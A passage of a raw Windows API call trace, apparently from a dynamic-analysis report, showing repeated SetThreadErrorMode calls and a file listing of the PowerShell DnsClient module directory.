(dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.870] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0227.871] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0227.871] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0227.871] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0227.871] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0227.871] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0227.871] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0227.872] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0227.872] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0227.872] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0227.872] FindNextFileW (in: hFindFile=0x25b73cd1d10, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 0 [0227.872] FindClose (in: hFindFile=0x25b73cd1d10 | out: hFindFile=0x25b73cd1d10) returned 1 [0227.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0227.873] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd0cf0 [0227.873] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.873] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0227.873] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0227.874] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0227.874] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0227.874] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0227.874] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0227.874] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0227.874] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0227.875] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0227.875] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0227.875] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0227.875] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0227.875] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0227.875] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0227.876] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0227.876] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.876] FindClose (in: hFindFile=0x25b73cd0cf0 | out: hFindFile=0x25b73cd0cf0) returned 1 [0227.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x653ef8cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0227.876] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DnsClient" (normalized: 